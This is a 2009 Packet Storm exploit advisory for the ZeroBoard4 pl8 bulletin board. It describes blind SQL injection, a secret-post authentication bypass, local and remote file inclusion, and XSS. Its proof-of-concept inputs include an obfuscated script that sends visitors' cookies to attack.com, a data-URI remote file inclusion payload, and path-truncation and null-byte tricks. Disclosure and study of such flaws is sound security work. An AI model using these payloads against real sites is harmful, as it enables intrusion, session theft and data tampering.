exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ZeroBoard4 LFI / SQL Injection / Bypass

ZeroBoard4 LFI / SQL Injection / Bypass
Posted Feb 6, 2009
Authored by make0day

ZeroBoard4 pl8 (07.12.17) suffers from local file inclusion, blind SQL injection, cross site scripting, and authentication bypass vulnerabilities.

tags | exploit, local, vulnerability, xss, sql injection, bypass, file inclusion
SHA-256 | 0ef49cff0260bee1072b65864128cd4b397e7d3306abfbeb006d005e0cec0ec7

ZeroBoard4 LFI / SQL Injection / Bypass

Change Mirror Download
ZeroBoard4 pl8 (07.12.17) Multiple Remote/Local Vulnerability 
bY make0day@gmail.com
thx to : Flyh4t
/*************************

ZeroBoard4 (VERSION pl8 (07.12.17))is most famous and widely used bulletin board system of Korea.
It is freely available for all platforms that supports PHP and MySQL.
There are Remote File Inclusion(?), Local File Inclusion, Blind sql injection vulnerability
XSS, and Secret post view Vulnerability.
As I know, ZeroBoard4 will not be updated anymore because of zb developer start new project
that was called zbxe. If you still use zb4, U d better update to XE! :-)
Here is the details:

**************************/
TEST ON VERSION ZeroBoard4 pl8 (07.12.17)
Download : http://www.zeroboard.com
/***************************
[0x01] Blind SQL Injection Vulnerability

/wrtie_ok.php

<?
//set_time_limit(0);

include "_head.php";

¡Š¡Š

@mysql_query("update $t_board"."_$id set headnum='$headnum',prev_no='$prev_no',next_no='$next_no',
child='$child',depth='$depth',arrangenum='$arrangenum',father='$father',name='$name',email='$email',
homepage='$homepage',subject='$subject',memo='$memo',sitelink1='$sitelink1',sitelink2='$sitelink2'
,use_html='$use_html',reply_mail='$reply_mail',is_secret='$is_secret',category='$category'
$del_que1 $del_que2 where no='$no'") or error(mysql_error());
//del_que1 and del_qu2 wern`t initialized

*************************/

poc:
Well, I`m so lazy person :-(
I didn`t make a exploit about this vuln.
BTW, Do you know what is the most important thing?
Attacker can control all post in same board!
For example :]
when attacker set his own post like this :
title : hola brotha!
content : Itz party time!
del_que1 : 1 or 1=1--

All post in the same board will be setted same as attacker`s one
Yeah.. Itz very bad news :-|

/***************************
[0x02] Secret post view Auth bypass Vulnerability

/view.php
//When someone write a post, cookie will be seted
$secret_str = $setup[no]."_".$no;
@setcookie("zb_s_check",$secret_str);
//zb_s_check is just a post number


/write.php

//When someone trying to modify his own post,
//Permission is checked right this:

¡Š¡Š

if($mode=="modify") {

if($data[is_secret]&&!$is_admin&&$data[ismember]!=$member[no]
&&$HTTP_COOKIE_VARS[zb_s_check]!=$setup[no]."_".$no) error("Á€»óÀûÀÎ ¹æ¹ýÀž·Î ŒöÁ€ÇÏŒŒ¿ä");

//If zb_s_check == no than that it will be bypassed


*************************/

poc:
No exploit is needed

/***************************
[0x03] Local file Inclusion Vulnerability

/include/write.php

if(eregi(":\/\/",$dir)||eregi("\.\.",$dir)) $dir ="./"; //....:)

...

include $dir."/write.php";

//write.php filter :// and ..
//When we use absolute path, we can bypass filtering! :)

*************************/

poc:
dir=C:/Apache/htdocs/bbs/data/board1/make0day.txt%00

or

//If you have same account in that server

dir=/tmp

//And Flyh4t said, at some windows server we can ignore '/write.php'
//By using many '/'.
//Maybe you can find a clue from below :

<?php
$a='';
for($i=0;$i<=4071;$i++) {
$a .= '/';
}
$a = 'test.txt'.$a; require_once($a.'.php');
?>

/***************************
[0x04] XSS

poc:
<img src="make0day" width=0 height=0>
<img src="make0day" onError=((document.all.tags('img')[0]).src='http://attack.com/c.php?c='+(eval(('D'+'o'+'C'+'u'+'M'+'e'+'N'+'t'+'.'+'C'+'o'+'O'+'k'+'I'+'e').toLowerCase()))) width=0 height=0>
//GNUBoard final version is also insecure.

/***************************
[0x05] Remote file Inclusion Vulnerability

/include/print_category.php

if(eregi(":\/\/",$dir)||eregi("^\.",$dir)) $dir ="./"; //Filtering

.....

include "$dir/category_main.php";

//They just filtering :// and .
//It looks so perfect to detect RFI
//but with php 5.2 & allow_url_include & register_globals that filtering is not secure
//By using data:;, we can execute some arbitary php command without %00
*************************/

poc:
/include/print_category.php?setup[use_category]=1&dir=data:;base64,PD9waHBpbmZvKCk7Lyo=

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close